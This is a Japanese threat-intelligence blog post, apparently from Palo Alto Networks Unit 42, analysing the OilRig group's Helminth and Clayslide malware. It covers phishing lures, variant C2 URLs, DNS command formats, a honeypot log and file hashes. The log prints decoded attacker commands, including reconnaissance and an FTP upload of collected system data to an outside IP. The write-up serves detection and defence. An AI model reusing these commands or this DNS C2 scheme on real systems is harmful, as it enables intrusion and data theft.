[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# OilRigマルウェア攻撃活動、ツールセットを更新し標的を拡大

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 3 分で読めます

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2016年10月4日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Clayside](https://unit42.paloaltonetworks.com/ja/tag/clayside-ja/)
  * [Helminth](https://unit42.paloaltonetworks.com/ja/tag/helminth-ja/)
  * [OilRig](https://unit42.paloaltonetworks.com/ja/tag/oilrig-ja/)
  * [OilRig attacks](https://unit42.paloaltonetworks.com/ja/tag/oilrig-attacks-ja/)
  * [Spear Phishing](https://unit42.paloaltonetworks.com/ja/tag/spear-phishing-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/?pdf=download&lg=ja&_wpnonce=8eff5d0d06 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/?pdf=print&lg=ja&_wpnonce=8eff5d0d06 "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=OilRigマルウェア攻撃活動、ツールセットを更新し標的を拡大&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F&title=OilRigマルウェア攻撃活動、ツールセットを更新し標的を拡大 "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F&text=OilRigマルウェア攻撃活動、ツールセットを更新し標的を拡大 "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=OilRigマルウェア攻撃活動、ツールセットを更新し標的を拡大%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F "Share in Mastodon")

## 概要

最初に公開した[2016年5月におけるOilRig攻撃活動](https://blog.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/)の分析以来、私たちはこのグループの新たな活動について監視を続けてきました。最近の数週間において、被害者に対して用いられるHelminthバックドアだけでなくClayslide配信文書も、グループが活発に更新していることが分かりました。そのうえ、このグループが標的とする組織の範囲は、サウジアラビア国内の組織だけでなく、カタール国内の会社やトルコ、イスラエル、アメリカ合衆国にある政府機関にまでも及んでいます。

### **拡大する標的対象**

OilRig攻撃活動の背後に潜むグループは、MicrosoftのExcel文書を添付ファイルとするスピアフィッシング メールを悪用して、被害者に対するセキュリティ侵害をし続けています。一例として、下記の電子メールがトルコの政府機関に送られましたが、これは航空会社のWebサイトに関する新しいポータル ログインと称する疑似餌を用いていました。(なお、下図で使われている電子メールの送信者は詐称されている可能性があります。)  
![図1 トルコの政府機関に送られたフィッシング電子メール](https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_1.png) 図1 トルコの政府機関に送られたフィッシング電子メール

ファイルusers.xlsが実行されマクロが有効になっている場合、下記のおとり文書が被害者に提示されます。  
![図2 悪意のあるHelminth XLSファイルの内容](https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_2.png) 図2 悪意のあるHelminth XLSファイルの内容

まさにこれと同じ文書内容が、複数の国にある政府機関を標的としているHelminthサンプルとともに使われていました。その攻撃に関して下記のファイル名が目撃されています。

* Help-Yemen.xls
* xls

こうした実例のほかに、カタールの複数の機関が、今年はじめのHelmnithサンプルを運ぶスピアフィッシング攻撃の対象となっていました。これらの場合、悪意のあるマクロ コードを運ぶのに使われた文書は、受信側の組織を非常に限定したものでした。ある場合には、受信者とすでに関係を築いていたパートナー機関から送られていました。

### **ツールセットに対する更新**

最近の数か月間、私たちはOilRigに関与する攻撃者が用いたマルウェアに対して多数の変更がされたことを突きとめました。過去5か月間で異なる亜種を4つ特定しましたが、各亜種は実行時に異なるファイル名をドロップします。これらの亜種は、ドロップされた際に下記のファイル名を使います。(FireEye社には、このマルウェアに社名が使われていることがマルウェア発見時に通報されました。)

* vbs / dns.ps1
* vbs / fireeye.ps1
* vbs / dn.ps1
* vbs / komisova.ps1

下記の時系列チャートは、各亜種の流行を示したものです。

ファイルusers.xlsが実行されマクロが有効になっている場合、下記のおとり文書が被害者に提示されます。  
![図3 時間経過に伴うHelminth亜種](https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_3.png) 図3 時間経過に伴うHelminth亜種

上記の時系列チャートで分かるとおり、攻撃者は、2016年5月末にマルウェアのupdate.vbs亜種からfireeye.vbs亜種へと利用対象を切り替えました。さらに最近になると、upd.vbs亜種が発見されており、これは活発に開発されたもののように見受けられます。コメントをはじめとする痕跡がこの亜種の中に発見されていますが、それについてはこの記事の後半で詳しく考察します。これよりもさらに最近になると、komisova.vbs亜種が使われていることが判明しています。

### **亜種間でのVBScriptの変更**

全体的に、ドロップされたVBSファイルにおける変更は、亜種間では最小限のものになっています。ここでおさらいですが、VBSスクリプトはHTTPを使ってリモートのサーバと通信する役割を担います。スクリプトはリモート サーバからファイルをダウンロードしては、そのファイルが入手可能な場合には実行に移る、ということを繰り返し試みます。次に、このファイルの出力は別のHTTPリクエストによってアップロードされます。また、ファイルはClayslideのExcel文書がドロップしたPowerShellスクリプトも実行します。

観測されている亜種間では、概して違いはわずかです。大きな違いは、使われているドメインとIPアドレスのように見受けられます。下記のURLは、各亜種が使っているものです。

#### **update.vbs**

* hxxp://winodwsupdates\[.\]me/counter.aspx?req=
* hxxp://go0gIe\[.\]com/sysupdate.aspx?req=

#### **fireeye.vbs**

* hxxp://update-kernal\[.\]net/update-index.aspx?req=
* hxxp://upgradesystems\[.\]info/upgrade-index.aspx?req=
* hxxp://yahoooooomail\[.\]com/update-index.aspx?req=
* hxxp://googleupdate\[.\]download/update-index.aspx?req=

#### **upd.vbs**

* hxxp://83.142.230\[.\]138:7020/update.php?req=

#### **komisova.vbs**

* hxxp://googleupdate\[.\]download/update-index.aspx?req=

2、3の注意点として、fireeye.vbs亜種の中に認められたものと同じURLをkomisova.vbs亜種が使っているという点も挙げられます。このドメインがごく最近のfireeye.vbs亜種の中にしか見られなかったことは指摘しておく価値があります。したがって、攻撃者がkomisovaへと切り替えている過渡期でfireeye.vbs亜種が使われた可能性が非常に高いと言えます。

upd.vbsをドロップするExcelファイルが、おそらく開発バージョンであることは以前に述べました。この主張を裏付ける証拠として、非標準ポートを使用しているIPアドレス接続がこのファイルで使用されていたという事実があります。このIPアドレスの特に興味深い特長の1つは、それが[2015年の暮れにSymantecによって発行された](https://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf)Remexiレポートに関連している点です。これは、これらの攻撃の背後にイランを拠点とする攻撃者がいると推測する前出の証拠と合致します。  
![図4 IPアドレスとRemexiの関係(PassiveTotalに示される)](https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_4.png) 図4 IPアドレスとRemexiの関係(PassiveTotalに示される)

upd.vbsの基盤となるコードは、他の亜種と比較すると、かなり整然としています。以下のとおりです。これは、それが積極的に開発されているというさらなる証拠を示しています。  
![図5 IPアドレスとRemexiの関係(PassiveTotalに示される)](https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_5.png) 図5 IPアドレスとRemexiの関係(PassiveTotalに示される)

upd.vbs亜種に見られるもう1つのマイナーな違いは、ダウンロードされるファイルの場所です。他の3つの亜種はすべて、ダウンロードしたファイルを%PUBLIC%/Libraries内にあるサブフォルダ内に配置します。しかし、この特定の亜種は、そのファイルを%USERPROFILE%/AppData/Local/Microsoft/Media/内にあるサブフォルダに配置します。

### **亜種間でのPS1の変更**

VBSファイルと同様に、PS1ファイルもリモート サーバと通信します。VBSファイルとは異なり、PS1ファイルはHTTPではなくDNSを使用します。コマンドとファイルの場所は、リモート サーバによって受信され、実行されます。その後、これらのコマンドの出力は追加のDNSリクエストを介してアップロードされます。この発生方法の綿密な分析については、以前の[OilRigブログ記事](https://blog.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/)を参照してください。概して、dns、fireeye、komisovaのPS1亜種の間にはかなりマイナーな違いがあります。ただし、dn.ps1亜種は大幅に更新されているようです。これらの更新に加え、ファイルにはかなりコメントが加えられており、特定のファイルが積極的に開発されたというさらなる証拠を示しています。  
![図6 dn.ps1亜種の先頭部分](https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_6.png) 図6 dn.ps1亜種の先頭部分

dn.ps1亜種は、次の特性を備えたDNSクエリを実行します。

rne\_\[victim\_id\]_\[random\].hostname rd_\[victim\_id\]_\[filename\]_\[file\_size\]_\[random\].hostname bne_\[victim\_id\]_random\].hostname bd_\[victim\_id\]_\[filename\]_\[file\_size\]_\[random\].hostname u_\[victim\_id\]_\[filename\]_\[byte\_position\]\_\[random\].hostname

|-----------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 | rne\_\[victim\_id\]_\[random\].hostname rd_\[victim\_id\]_\[filename\]_\[file\_size\]_\[random\].hostname bne_\[victim\_id\]_random\].hostname bd_\[victim\_id\]_\[filename\]_\[file\_size\]_\[random\].hostname u_\[victim\_id\]_\[filename\]_\[byte\_position\]\_\[random\].hostname |

上記のクエリでは、'rne'コマンドがリモート サーバに、ダウンロード用に正常なファイルが使用可能かどうかを問い合わせます。使用可能な場合、サーバは'OK'とレスポンスを返し、続いてファイル名を返します。この状況では、マルウェアは'rd'コマンドを実行し、実際に対象のファイルをダウンロードします。

同様に、'bne'コマンドと'bd'コマンドでもそれぞれ同じ実行フローが見られます。この特定の動作はバッチ ファイルのみを検索します。マルウェアは、ファイルのダウンロード中に、データ ストリームの終わりを示す文字列'EOFEOF'を探します。

'u'コマンドは、提供されたファイルまたはスクリプトから生成されたデータをアップロードするために使用されます。データは、アップロードされるファイルの現在のバイト位置を保持する'byte\_position'変数を使用して、少しずつアップロードされます。

この特定の亜種を数日間実行したところ、ハニーポットとやり取りするように攻撃者を誘うことができました。Pythonスクリプトを使用して収集されたPCAPを解析し、以下の結果が得られました(簡潔にするため一部割愛)。  
\[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1988996938.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1404872126.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK1.txt \[\*\] Filename: 1.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1\_-_txt\_0\_840824109.shalaghlagh.tk | Type: TXT \[+\] Response TXT: aG9zdG5hbWU= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1_-_txt\_8\_1643283204.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: hostname \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1534172028.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK2.txt \[\*\] Filename: 2.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_2_-_txt\_0\_579093369.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3lzdGVtaW5mbw== \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_2_-_txt\_10\_1446367320.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: systeminfo \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1130109782.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1735654322.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK3.txt \[\*\] Filename: 3.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_3_-_txt\_0\_122829473.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3RhcnQgZnRwIC1BIDg3LjExNy4yMDQuMTQz \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_3_-_txt\_27\_1524268269.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: start ftp -A 87.117.204.143 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_117849324.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_926300114.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK5.txt \[\*\] Filename: 5.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_0\_1307455992.shalaghlagh.tk | Type: TXT \[+\] Response TXT: d2hvYW1pPmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0KaXBjb25maWc\_PmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0Kc3 lzdGVtaW5mbz4\_Yzpcd2luZG93c1x0ZW1wXHQudHh0DQplY2hvIFBVVCBjOlx3aW5kb3dzXHRlbXBcdC50eHQg fCBmdHAgLUEgODcuMTE3LjIwNC4x \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_150\_2072649310.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NDM= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_152\_1977692291.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: whoami\&gt;c:\\windows\\temp\\t.txt ipconfig\&gt;\&gt;c:\\windows\\temp\\t.txt systeminfo\&gt;\&gt;c:\\windows\\temp\\t.txt echo PUT c:\\windows\\temp\\t.txt | ftp -A 87.117.204.143 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_155964816.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1003791024.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK7.txt \[\*\] Filename: 7.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_0\_1649905845.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3RhcnQgZnRwIC1BIDgzLjE0Mi4yMzAuMTM4 \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_27\_65323037.shalaghlagh.tk | Type: TXT \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_27\_65323037.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: start ftp -A 83.142.230.138 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1205170103.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_779542217.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK11.txt \[\*\] Filename: 11.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_11_-_txt\_0\_1213525986.shalaghlagh.tk | Type: TXT \[+\] Response TXT: QGVjaG8gb2ZmDQplY2hvIDE= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_11_-\_txt\_17\_651256114.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: @echo off echo 1 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_816831185.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO

|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 | \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1988996938.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1404872126.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK1.txt \[\*\] Filename: 1.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1\_-_txt\_0\_840824109.shalaghlagh.tk | Type: TXT \[+\] Response TXT: aG9zdG5hbWU= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1_-_txt\_8\_1643283204.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: hostname \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1534172028.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK2.txt \[\*\] Filename: 2.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_2_-_txt\_0\_579093369.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3lzdGVtaW5mbw== \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_2_-_txt\_10\_1446367320.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: systeminfo \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1130109782.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1735654322.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK3.txt \[\*\] Filename: 3.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_3_-_txt\_0\_122829473.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3RhcnQgZnRwIC1BIDg3LjExNy4yMDQuMTQz \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_3_-_txt\_27\_1524268269.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: start ftp -A 87.117.204.143 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_117849324.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_926300114.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK5.txt \[\*\] Filename: 5.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_0\_1307455992.shalaghlagh.tk | Type: TXT \[+\] Response TXT: d2hvYW1pPmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0KaXBjb25maWc\_PmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0Kc3 lzdGVtaW5mbz4\_Yzpcd2luZG93c1x0ZW1wXHQudHh0DQplY2hvIFBVVCBjOlx3aW5kb3dzXHRlbXBcdC50eHQg fCBmdHAgLUEgODcuMTE3LjIwNC4x \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_150\_2072649310.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NDM= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_152\_1977692291.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: whoami\&gt;c:\\windows\\temp\\t.txt ipconfig\&gt;\&gt;c:\\windows\\temp\\t.txt systeminfo\&gt;\&gt;c:\\windows\\temp\\t.txt echo PUT c:\\windows\\temp\\t.txt | ftp -A 87.117.204.143 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_155964816.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1003791024.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK7.txt \[\*\] Filename: 7.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_0\_1649905845.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3RhcnQgZnRwIC1BIDgzLjE0Mi4yMzAuMTM4 \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_27\_65323037.shalaghlagh.tk | Type: TXT \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_27\_65323037.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: start ftp -A 83.142.230.138 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1205170103.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_779542217.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK11.txt \[\*\] Filename: 11.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_11_-_txt\_0\_1213525986.shalaghlagh.tk | Type: TXT \[+\] Response TXT: QGVjaG8gb2ZmDQplY2hvIDE= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_11_-\_txt\_17\_651256114.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: @echo off echo 1 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_816831185.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO |

おわかりのとおり、攻撃者によって、リモートFTPサーバとの通信試行やさまざまな偵察コマンドを含め、多数の興味深いコマンドが受信されました。これらのコマンドは、一見ランダムな間隔でやってきました。それは、自動化されたシステムではなく、それらを発行している実際の攻撃者からのコマンドである可能性が高いことを示しています。

## **結論**

HelminthおよびClayslideマルウェア ファミリを使用している攻撃者は、引き続き、カスタマイズされたマルウェアを使用して、世界中の高価値の企業や組織を標的にしています。このブログ記事で説明したファイルに見られたように、このマルウェアは、活発に開発されており、継続的に更新と改良が加えられています。導入されたマルウェアは恐ろしく精巧なわけではありませんが、多くの施設で気付かれずに留まることができるDNSコマンド アンド コントロール(C2)などの手法を用いています。

Palo Alto Networksのお客様は、次の方法で脅威から保護されています。

* WildFireは、すべてのHelminthおよびClayslideのサンプルを悪意のあるものとして特定します。
* コマンド アンド コントロール サーバとして識別されたドメインは、悪意あるものとしてフラグ付けされます。
* AutoFocusタグの[Helminth](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Helminth)と[Clayslide](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Clayslide)を使用して、このグループを追跡できます。

### **セキュリティ侵害の兆候**

F04CF9361CF46BFF2F9D19617BBA577EA5F3AD20EA76E1F7E159701E446364FC  
E2EC7FA60E654F5861E09BBE59D14D0973BD5727B83A2A03F1CECF1466DD87AA  
31DB0841C3975BE5395F13C894B7E444D150CC701487B756FFF43CE78D98B1E6  
C3C17383F43184A29F49F166A92453A34BE18E51935DDBF09576A60441440E51  
C6437F57A8F290B5EC46B0933BFA8A328B0CB2C0C7FBEEA7F21B770CE0250D3D  
5A2C38BE89AC878D28080A7465C4A3F8708FB414B811511B9D5AE61A47593A69  
BD0920C8836541F58E0778B4B64527E5A5F2084405F73EE33110F7BC189DA7A9  
90639C7423A329E304087428A01662CC06E2E9153299E37B1B1C90F6D0A195ED  
528D432952EF879496542BC62A5A4B6EEE788F60F220426BD7F933FA2C58DC6B  
3772D473A2FE950959E1FD56C9A44EC48928F92522246F75F4B8CB134F4713FF  
F3856C7AF3C9F84101F41A82E36FC81DFC18A8E9B424A3658B6BA7E3C99F54F2  
0CD9857A3F626F8E0C07495A4799C59D502C4F3970642A76882E3ED68B790F8E  
80161DAD1603B9A7C4A92A07B5C8BCE214CF7A3DF897B561732F9DF7920ECB3E  
D874F513A032CCB6A5E4F0CD55862B024EA0BEE4DE94CCF950B3DD894066065D  
5E9DDB25BDE3719C392D08C13A295DB418D7ACCD25D82D020B425052E7BA6DC9  
299BC738D7B0292820D99028289280BA24D7FB985851D9C74060AF7950CECEF0  
2E226A0210A123AD828803EB871B74ECBDB702FC4BABD9FF786231C486FF65E0  
F1DE7B941817438DA2A4B7284BC56C291DB7312E3BA5E2397B3621811A816AA3  
65920EAEA00764A245ACB58A3565941477B78A7BCC9EFAEC5BF811573084B6CF  
742A52084162D3789E196FB5FF6F8E2983147CD914088BD5F9ED363D7A5B0DF0  
4E5B85EA68BF8F2306B6B931810AE38C8DFF3679D78DA1AF2C91032C36380353  
36D4B4B018EC78A79F3C06DC30EC77C250307628A7631F6B5B5995E797D0674F  
005DDE45A6F1D9B2A254E71F89F12AB0DFAAA48D081F5C0A434800BD5C327086  
2C4BCAB135BF1846684B598E66E3F51443F70F9E8D0544F3417774CBE907E8EF  
